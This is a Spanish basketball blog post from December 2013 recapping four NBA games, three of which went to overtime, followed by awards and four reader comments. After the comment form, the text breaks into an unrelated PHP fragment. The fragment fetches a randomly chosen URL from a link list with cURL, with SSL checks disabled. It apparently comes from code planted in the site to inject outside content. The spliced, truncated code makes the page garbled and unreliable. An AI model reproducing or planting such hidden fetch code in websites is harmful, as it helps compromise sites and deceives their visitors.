La Crónica: Cuatro partidos, tres prórrogas.

27 de December de 2013 por TheDeerHunter

Espectacular mini-jornada, como anticipamos en el titular, y casi lo más sorprendente es que no todo ocurrió en el Oeste.

El choque estelar del día terminó siendo el Hawks@Cavs. Antológico duelo Irving vs Jeff Teague que, aunque parezca mentira, terminó llevándose el segundo en el mejor partido de su carrera. A su mejor marca anotadora y sus 14 asistencias hay que apuntar el canastón para empatar en la primera prórroga y el buzzer-beater definitivo. Con todo la victoria podría volverse pírrica para Atlanta, pues perdió a dos titulares por lesión, Horford y Carrol, y está por ver la gravedad de las mismas.

También hubo periodo extra en el Clippers@Blazers, con la segunda cruel derrota in extremis de Clippers consecutiva. Precioso duelo entre Aldridge y Griffin, con un extraordinario Chris Paul y buenas aportaciones de Crawford y Matt Barnes (que debería ser titular habitualmente) servían para que los Clippers tuvieran el partido en sus manos a pesar del rendimiento colectivo superior de sus rivales. Batum anotaba el triple para empatar en el reglamentario. Después la presión del antiguo Rose Garden (AKA Moda center ahora) se impuso en otro mal día arbitral para el equipo pobre de L.A.

Ante estos precedentes es complicado mantener el nivel, pero el resto de la jornada lo logró, incluso batiendo un par de registros históricos.

Sensacional remontada de los Rockets ante Memphis. Los problemas de faltas limitaron la presencia de Howard y dió alas a los Grizzlies, pero en su ausencia Motiejunas terminó siendo uno de los héroes del día con su ímpetu defensivo que sentaba las bases de la machada. Lin, Parsons, Terrence Jones… se mueven bien en una marejada anímica de este estilo. Por su parte Harden recordó sus días en OKC y desquició a los Grizzlies desde la línea. Sus 27 puntos es la mejor marca de la historia en alguien que anota como mucho 2 canastas en juego (22 de 25 en tiros libres)

Finalmente otra gran victoria de los Spurs en Dallas. El marcador resulta engañoso pues fue mucho más igualado de lo que parece indicar. Todo terminó resolviéndose con el buen hacer de Parker y Duncan, pero especialmente por la impecable actuación de Danny Green, el cuarto jugador en la historia en anotarlo todo (libres, triples y de dos). Uno de esos cuatro es Calderón, por cierto.

PREMIOS

MVP: Ya hemos nombrado la brillante actuación de Jeff Teague, lo más parecido a un sueño. No se puede pedir más.

Sorpresa: No es que dudemos que Danny Green sea capaz de repetir una cosa así, en un día iluminado como tuvo anoche. Simplemente es que tal nivel de acierto casi siempre tiene un punto de casual.

Decepción: Comprobar día tras día el nivel en el que se encuentra Jared Dudley y que nadie pueda toser su condición de titular. Uno de los aparentes errores de Doc Rivers este año.

Esfuerzo en vano: A pesar de los 40 pntos de Kyrie Irving (con porcentajes discretos, por cierto) nos quedamos con el dúo CP3-Griffin. 34-16 asistencias, más 6 robos del primero y 35-11 del segundo.

Comenta

4 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Lo de Harden y los tiros libres… que asco ya le pitan todo macho

      Citar

  2. Luis H. dice:
    #2

    Dos apuntes para el artículo, que está muy bien por lo demás. En “la sorpresa”, supongo que el autor quiso decir “en un día iluminado como el que tuVo anoche”, cosas del directo. Y por otro lado, los porcentajes de Irving tampoco fueron discretos como tal; hizo 17-33, 3-8 en triples y 3-4 en tiros libres. Está cerca del 50% en todas las estadísticas

      Citar

  3. Ruxixón dice:
    #3

    Siempre han tenido fama de rácanos pero la gestión de Atlanta desde que se deshicieron de Joe Johnson es para alabar,con contratos firmados muy acorde a la relación calidad-precio,quizás la excepción sea el contrato de Korver.Para más inri se han movido en esa línea de la eficacia contratando a Bud,que se ve que tiene hechuras de gran entrenador.

    Jose Luis:
    Lo de Harden y los tiros libres… que asco ya le pitan todo macho

    Agree

      Citar

  4. TheDeerHunter dice:
    #4

    Luis H.:
    Dos apuntes para el artículo, que está muy bien por lo demás. En “la sorpresa”, supongo que el autor quiso decir “en un día iluminado como el que tuVo anoche”, cosas del directo. Y por otro lado, los porcentajes de Irving tampoco fueron discretos como tal; hizo 17-33, 3-8 en triples y 3-4 en tiros libres. Está cerca del 50% en todas las estadísticas

    Cierto a todo. Gracias

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>